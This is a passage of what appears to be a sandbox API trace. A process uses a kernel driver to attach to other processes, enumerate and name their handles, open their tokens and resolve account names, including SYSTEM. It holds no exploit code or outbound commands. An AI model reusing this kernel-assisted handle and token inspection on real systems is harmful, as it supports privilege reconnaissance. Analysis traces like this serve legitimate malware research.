(hObject=0xc4) returned 1 [0158.742] CloseHandle (hObject=0xc8) returned 1 [0158.742] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.743] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.743] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.743] PsAcquireProcessExitSynchronization () returned 0x0 [0158.743] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0) [0158.743] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002151170, HandleInformation=0x0) returned 0x0 [0158.743] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.743] PsReleaseProcessExitSynchronization () returned 0x2 [0158.743] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0158.743] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.743] ObfDereferenceObject (Object=0xfffffa8002151170) returned 0x1 [0158.744] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.744] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.744] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.744] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0158.744] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.744] PsAcquireProcessExitSynchronization () returned 0x0 [0158.744] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0) [0158.744] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002133330, HandleInformation=0x0) returned 0x0 [0158.744] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.744] PsReleaseProcessExitSynchronization () returned 0x2 [0158.744] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0158.745] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.745] ObfDereferenceObject (Object=0xfffffa8002133330) returned 0x1 [0158.745] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.745] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.745] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.745] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.745] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.745] PsAcquireProcessExitSynchronization () returned 0x0 [0158.745] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0) [0158.745] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.745] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.745] PsReleaseProcessExitSynchronization () returned 0x2 [0158.746] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0158.746] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.746] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.746] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.746] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.746] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.746] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0158.746] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.746] PsAcquireProcessExitSynchronization () returned 0x0 [0158.746] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0) [0158.746] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002151a90, HandleInformation=0x0) returned 0x0 [0158.746] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.747] PsReleaseProcessExitSynchronization () returned 0x2 [0158.747] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0158.747] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.747] ObfDereferenceObject (Object=0xfffffa8002151a90) returned 0x1 [0158.747] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.747] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.747] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.747] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.747] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.747] PsAcquireProcessExitSynchronization () returned 0x0 [0158.747] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880051635d0) [0158.747] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001915e40, HandleInformation=0x0) returned 0x0 [0158.747] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.748] PsReleaseProcessExitSynchronization () returned 0x2 [0158.748] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0158.748] ObQueryNameString (in: Object=0xfffff8a001915e40, ObjectNameInfo=0xfffffa80030a8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a8044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.748] ObfDereferenceObject (Object=0xfffff8a001915e40) returned 0x1 [0158.748] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.748] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9c4) returned 0xc8 [0158.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.748] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002164b30, HandleInformation=0x0) returned 0x0 [0158.748] ObOpenObjectByPointer (in: Object=0xfffffa8002164b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.748] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x14 [0158.748] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.748] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.748] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.748] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.749] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0159.313] CloseHandle (hObject=0xc4) returned 1 [0159.313] CloseHandle (hObject=0xc8) returned 1 [0159.313] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.313] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0159.313] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.313] PsAcquireProcessExitSynchronization () returned 0x0 [0159.313] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0) [0159.313] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80021644f0, HandleInformation=0x0) returned 0x0 [0159.313] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.313] PsReleaseProcessExitSynchronization () returned 0x2 [0159.314] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0159.314] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800302e584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800302e584, ReturnLength=0xfffff88005163508) returned 0x0 [0159.314] ObfDereferenceObject (Object=0xfffffa80021644f0) returned 0x1 [0159.314] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.314] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.314] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.314] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0159.314] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.314] PsAcquireProcessExitSynchronization () returned 0x0 [0159.314] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0) [0159.314] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80021617d0, HandleInformation=0x0) returned 0x0 [0159.314] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.314] PsReleaseProcessExitSynchronization () returned 0x2 [0159.314] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0159.314] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.314] ObfDereferenceObject (Object=0xfffffa80021617d0) returned 0x1 [0159.314] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.315] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.315] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.315] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0159.315] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.315] PsAcquireProcessExitSynchronization () returned 0x0 [0159.315] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0) [0159.315] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0159.315] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.315] PsReleaseProcessExitSynchronization () returned 0x2 [0159.315] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0159.315] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.315] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0159.315] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.315] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.315] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.315] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0159.316] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.316] PsAcquireProcessExitSynchronization () returned 0x0 [0159.316] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0) [0159.316] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800216a070, HandleInformation=0x0) returned 0x0 [0159.316] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.316] PsReleaseProcessExitSynchronization () returned 0x2 [0159.316] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0159.316] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.316] ObfDereferenceObject (Object=0xfffffa800216a070) returned 0x1 [0159.316] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.316] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.316] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0159.316] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.316] PsAcquireProcessExitSynchronization () returned 0x0 [0159.316] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880051635d0) [0159.316] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00191b4c0, HandleInformation=0x0) returned 0x0 [0159.316] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.317] PsReleaseProcessExitSynchronization () returned 0x2 [0159.317] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0159.317] ObQueryNameString (in: Object=0xfffff8a00191b4c0, ObjectNameInfo=0xfffffa800302e584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800302e584, ReturnLength=0xfffff88005163550) returned 0x0 [0159.317] ObfDereferenceObject (Object=0xfffff8a00191b4c0) returned 0x1 [0159.317] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.317] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc8 [0159.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0159.317] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002089b30, HandleInformation=0x0) returned 0x0 [0159.317] ObOpenObjectByPointer (in: Object=0xfffffa8002089b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0159.317] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x3a [0159.317] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80022a7d00 | out: TokenHandle=0xfffffa80022a7d00*=0xc4) returned 0x0 [0159.317] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0159.317] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.318] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0159.318] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0159.320] CloseHandle (hObject=0xc4) returned 1 [0159.320] CloseHandle (hObject=0xc8) returned 1 [0159.320] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0159.321] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.321] PsAcquireProcessExitSynchronization () returned 0x0 [0159.321] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.321] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020b7070, HandleInformation=0x0) returned 0x0 [0159.321] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.321] PsReleaseProcessExitSynchronization () returned 0x2 [0159.321] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.321] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.321] ObfDereferenceObject (Object=0xfffffa80020b7070) returned 0x1 [0159.321] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.321] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.321] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0159.321] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.322] PsAcquireProcessExitSynchronization () returned 0x0 [0159.322] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.322] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020ccf20, HandleInformation=0x0) returned 0x0 [0159.322] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.322] PsReleaseProcessExitSynchronization () returned 0x2 [0159.322] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.322] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.322] ObfDereferenceObject (Object=0xfffffa80020ccf20) returned 0x1 [0159.322] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.322] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.322] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0159.322] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.322] PsAcquireProcessExitSynchronization () returned 0x0 [0159.322] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.322] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0159.322] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.322] PsReleaseProcessExitSynchronization () returned 0x2 [0159.322] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.322] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.323] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x4 [0159.323] IofCompleteRequest 